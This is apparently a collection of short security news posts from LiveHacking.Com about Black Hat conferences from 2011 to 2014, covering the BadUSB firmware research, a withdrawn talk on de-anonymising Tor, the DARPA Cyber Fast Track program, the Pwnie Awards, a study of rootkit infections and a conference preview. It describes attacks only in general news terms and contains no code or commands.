December 21, 2014

Researchers at Black Hat conference demo USB’s fatal flaw

usb-flash-drive(LiveHacking.Com) – Security experts Karsten Nohl and Jakob Lell have demonstrated how any USB device can be reprogrammed and used to infect a computer without the user’s knowledge.

During a presentation at the Black Hat Security conference, and in a subsequent interview with the BBC, the duo have raised the question about the future security of USB devices.

As part of the demo, a normal looking smartphone was connected to a laptop, maybe something a friend or colleague might ask you to do so they can charge the device. But the smartphone was modified to present itself as a network card and not a USB media device. The result was that the malicious software on the phone was able to redirect traffic from legitimate web sites to shadow servers, which fake and the look and feel of the genuine sites, but are actually designed just to steal login credentials.

According to a blog entry posted by the pair, USB’s great versatility is also its Achilles heel. “Since different device classes can plug into the same connectors, one type of device can turn into a more capable or malicious type without the user noticing,” wrote the researchers.

The experts, who work for Security Research Labs in Germany, gave a presentation at the Black Hat conference called “BadUSB — On accessories that turn evil.” Every USB device has a micro-controller that isn’t visible to the user. It is responsible for talking with the host device (e.g. a PC) and interfacing with the actual hardware. The firmware for these microcontrollers is different on every USB device and what the micro-controller software does is different on every device. Webcams, keyboards, network interfaces, smartphones and flash drives all perform different tasks and the software is developed accordingly.

However, the team managed to reverse engineer and hack the firmware on different devices in under two months. As a result they can re-program the devices and get them to act as something they are not.

During their Black Hat presentation, a standard USB drive was inserted into a computer. Malicious code implanted on the stick tricked the PC into thinking a keyboard had been plugged in. The fake keyboard then began typing in commands – and forced the computer to download malware from the internet.

Defending against this type of attack includes tactics like code-signing of the micro-controller firmware updates or the disabling of firmware changes in hardware. However these must all be implemented by the USB device makers and isn’t something that end users can enforce.

You can download the slides from the presentation here: https://srlabs.de/blog/wp-content/uploads/2014/07/SRLabs-BadUSB-BlackHat-v1.pdf

Presentation on how to break Tor removed from Black Hat schedule

Tor project logo(LiveHacking.Com) – A highly anticipated briefing about a low-cost technique for de-anonymising Tor users has been removed from the Black Hat 2014 talk schedule for as-yet unknown reasons. The talk, which would have presented a method on how to identify Tor users, was cancelled at the request of attorneys for Carnegie Mellon University in Pittsburgh, where the speakers work as researchers.

The spokesperson for the conference, which is running in Las Vegas on August 6-7, said that a Carnegie Mellon attorney informed Black Hat that one of the speakers could not give the Tor talk because the material he would reveal has not been approved for public release by the university or by the Software Engineering Institute (SEI).

The Onion Router (TOR) Project network was originally developed with the US Naval Research Laboratory as part of an investigation into privacy and cryptography on the Internet. Tor re-directs Internet traffic through a set of encrypted relays to conceal a user’s location or usage from anyone monitoring their network traffic. Using Tor makes it more difficult for online activity to be traced including “visits to Web sites, online posts, instant messages, and other communication forms.”

According to Roger Dingledine, one of the original Tor developers, the project did not “ask Black Hat or CERT to cancel the talk. We did (and still
do) have questions for the presenter and for CERT about some aspects of the research, but we had no idea the talk would be pulled before the announcement was made.” He went on to say that the project encourages research on the Tor network along with responsible disclosure of all new and interesting attacks. “Researchers who have told us about bugs in the past have found us pretty helpful in fixing issues, and generally positive to work with,” he added.

Security researcher Alexander Volynkin was scheduled to give the talk titled ‘You Don’t Have to be the NSA to Break Tor: Deanonymizing Users on a Budget’ at the Black Hat conference. It would have outlined ways that individuals can try to find the original source of Tor traffic without the need for large amounts of computing power.

Black Hat: DARPA Launch Cyber Fast Track Program

(LiveHacking.Com) – Peiter Zatko, a hacker known as Mudge who now works at the Defense Advanced Research Projects Agency (DARPA) has told security experts at the Black Hat conference in Las Vegas of DARPA’s new “Cyber Fast Track” program which enables the Pentagon to quickly fund hackers to tackle its tough cybersecurity challenges.

This latest project, aimed at getting cybersecurity expertise into government, cuts red tape and allows hackers to apply for funding for projects that would help the Defense Department secure computer networks.

Zatko said he decided it was time to start funding hackers and boutique security firms, “and making it actually easy enough for them to compete for government research money with the large, traditional government contractors.”

Addressing a key issue for hackers doing government projects, they will be allowed to keep the commercial intellectual property rights while giving the Defense Department use of the project.

Black Hat: The Pwnies 2011 Security Award Winners

(LiveHacking.Com) – The winners of this year’s Pwnie Awards have been given out during the BlackHat USA security conference in Las Vegas. The annual awards ceremony celebrates the achievements and failures of security researchers and the security community.

The award for the Best Server-Side Bug went to Juliano Rizzo, Thai Duong – Juliano and Thai showed that the ASP.NET framework is vulnerable to a padding oracle attack that can be used to remotely compromise almost any ASP.NET web application, often leading to remote code execution on the server.

The Pwnie for Best Client-Side Bug was awarded to Comex – Comex exploited a vulnerability in the interpreter for Type 1 font programs in the FreeType library used by MobileSafari. This exploit is a great example of programming a weird machine to exploit a modern system. Comex used his control over the interpreter to construct a highly sophisticated ROP payload at runtime and bypass the ASLR protection in iOS. Furthermore, the ROP payload exploited a kernel vulnerability to execute code in the kernel and disable code-signing. The exploit was hosted on jailbreakme.com and was successfully used by thousands of people to jailbreak their iOS devices.

The Best Privilege Escalation Bug went to Tarjei Mandt – In the span of a few months, Tarjei found more than 40 vulnerabilities in the Windows kernel. In his presentation at Infiltrate 2011, he described the details of these vulnerabilities and his kernel exploitation techniques.

The Most Innovative Research Pwnie went to Piotr Bania – To implement some of the ideas from pax-future.txt is one thing, to implement them through static analysis on Windows, rewriting drivers automagically, and have it all work preserving binary compatibility across a wide range of Windows versions: that’s deserving of respect.

And finally the Lamest Vendor Response was awarded to RSA –  They got hacked, their SecurID tokens were totally compromised, and they basically passed it off as a non-event and advised customers that replacing the tokens is not necessary … until Lockheed-Martin got attacked because of them.

Windows XP is Petri Dish For Rootkit Infections

(LiveHacking.Com) – A six month study, by the AVAST Virus Lab, has found that 74% of rootkit infections originated from Windows XP machines, compared to 17% for Vista and only 12% from Windows 7 machines.

Window XP is the most common PC operating system with around 49% of avast! antivirus users running it compared to the 38% with Windows 7 and the 13% with Vista.

And the problem seems to be that there are a large number of pirate copies of XP which don’t run automatic updates as they can’t be validated by the Windows Genuine Advantage validation process. This leaves the out-of-date and upatched OS open to all kinds of attack, even old ones long patch by Microsoft.

“Because of the way they attack – and stay concealed – deep in the operation system, rootkits are a perfect weapon for stealing private data” said Przemyslaw Gmerek, the AVAST expert on rootkits and lead researcher.

Cybercriminals are continuing to fine-tune their attack strategy with the Master Boot Record (MBR) remaining their favorite target for even the newest TDL4 rootkit variants.
The study found that rootkits infecting via the MBR were responsible for over 62% all rootkit infections. Driver infections made up only 27% of the total. The clear leader in rootkit infection were the Alureon(TDL4/TDL3) family, responsible for 74% of infections.

Experts from AVAST Software will be attending the upcoming Blackhat events in Las Vegas on August 3-7, 2011.

And the Winner is….

A REVIEW OF BLACK HAT’S 2011 PREVIEW DOESN’T DISAPPOINT

(LiveHacking.Com) — As a security compliance professional with a limited training budget, I really had to do my home work this year to choose my learning opportunities wisely. So when the question came up “Are you going to Black Hat this year?” I had to pause and ponder… Am I? So off I went to do my research: Who’s going to speak, present, train, showcase this year and what will the ‘wow’ factor be? In doing my ‘use your money wisely’ research, I looked at other security conferences that offer training and I discovered that the Computer Security Institute’s (CSI) annual conference has been canceled this year and they are actually referring people to Black Hat. After completing my research, I had made my ‘more bang for my corporate buck decision’. And the winner is… Black Hat wins hands down!

This year’s event will be hosted at Caesars Palace in Las Vegas July 30th -Aug 4th and offer over 50 multi-day training sessions, feature 7 Briefings tracks with the latest research, and 2 workshop tracks dedicated to practical application and demonstration of tools. Over the years, Black Hat has earned the reputation for being the premier security event where members of the security industry gather together to learn from elite security researchers, discuss threats to an organization and develop ways to tackle them.

Previous years, have entertainingly educated us. In 2010, I found out:

Our money isn’t safe – researcher Barnaby Jack demonstrated how some ATMs are not very hard to compromise. He did it by both physically opening the machine & installing malware on it and by compromising the ATM over the network.

Our cell phones aren’t safe – Mobile Security was hit hard in 2010, Carmen Sandiego showed that you don’t have to be a phone company or government to find out who’s using a particular cell phone number or where the phone is located. I actually used this scenario for a Mock Security Incident at my company this year. – Thanks for the great idea Black Hat!

So what can we expect from Black Hat 2011? – Glad you asked. New this year, Black Hat has formed a Content Review Board comprised of sixteen experts throughout the areas of information security. As a part of this peer review, Black Hat will bring public and private sector security professionals and underground hackers together to uncover groundbreaking vulnerabilities and debut new security tools. Not surprisingly this year is expected to be the biggest Black Hat Conference yet, with over 6,000 Black Hatters in attendance. 2011’s special events include: Def Con, Black Hat Arsenal, Executive Briefing, and USA 2011 Uplink: Live Streaming Video.

2011 Key Note Speakers are Cofer Black and Peiter “Mudge” Zatko. Cofer, will discuss the 10th Anniversary of 9/11 and Lessons Learned for Black Hat. And Mudge, will discuss How a Hacker Has Helped Influence the Government – and Vice Versa.

In addition to the top-notch key note speakers, I am definitely looking forward to catching many of the countless opportunities to learn, grow, gain insight, and engage in great industry discussions. Here is my choice of top 10 events that I will be sure to look for:

  1. Faces Of Facebook-Or, How The Largest Real ID Database In The World Came To Be
  2. Legal Aspects of Cybersecurity (AKA) CYBERLAW: A Year in Review, Cases, issues, your questions my (alleged) answers
  3. The Law of Mobile Privacy and Security
  4. SSH as the next back door. Are you giving hackers root access?
  5. Don’t Drop the SOAP: Real World Web Service Testing for Web Hackers
  6. Reverse Engineering Browser Components: Dissecting and Hacking Silverlight, HTML 5 and Flex
  7. Corporate Espionage for Dummies: The Hidden Threat of Embedded Web Servers
  8. Staring into the Abyss: The Dark Side of Security and Professional Intelligence
  9. WORKSHOP – Infosec 2021: A Career Odyssey
  10. Turbo Talk – Familiarity Breeds Contempt: The Honeymoon Effect and the Role of Legacy Code in Zero-Day Vulnerabilities

Honorable Mention – I love this title! – Don’t Hate the Player, Hate the Game: Inside the Android Security Patch Lifecycle

About the author:
Angel’s Security Compliance knowledge is well honed by her experience from working with and consulting for multiple companies in a variety of industries. Peers and customers consider her a knowledgeable and positive motivator at all levels. She has had the pleasure of establishing an effective security program at multiple companies designed to addresses information system threats and corporate risks. She takes great pride in her ability to assist with business, operational and technology concerns. She understands the benefits gained from explaining risks in a business-oriented, non-technical manner. She believes that educating people in security, compliance and risk management ‘common sense’ is the foundation to any successful security program. Angel also prides herself in staying on top of industry standards and new innovations in the security and compliance field. Her professional past time includes meeting and networking with peers that have similar interest and goals. Her personal motto is: “Work hard, work smart, never stop learning or listening, do what’s right all of the time and never burn bridges.”

Free Access to Black Hat USA 2010 Media Archive

Black Hat USA 2010 was one of the best hacking events in 2010. There were many interesting hacking projects and vulnerability exploits such as ATM machine hacking.

Black Hat USA 2010 media archive is available for free to public. In this archive you can find whitepapers, presentations and source materials.

Visit Black Hat USA 2010 Media Archive for full access.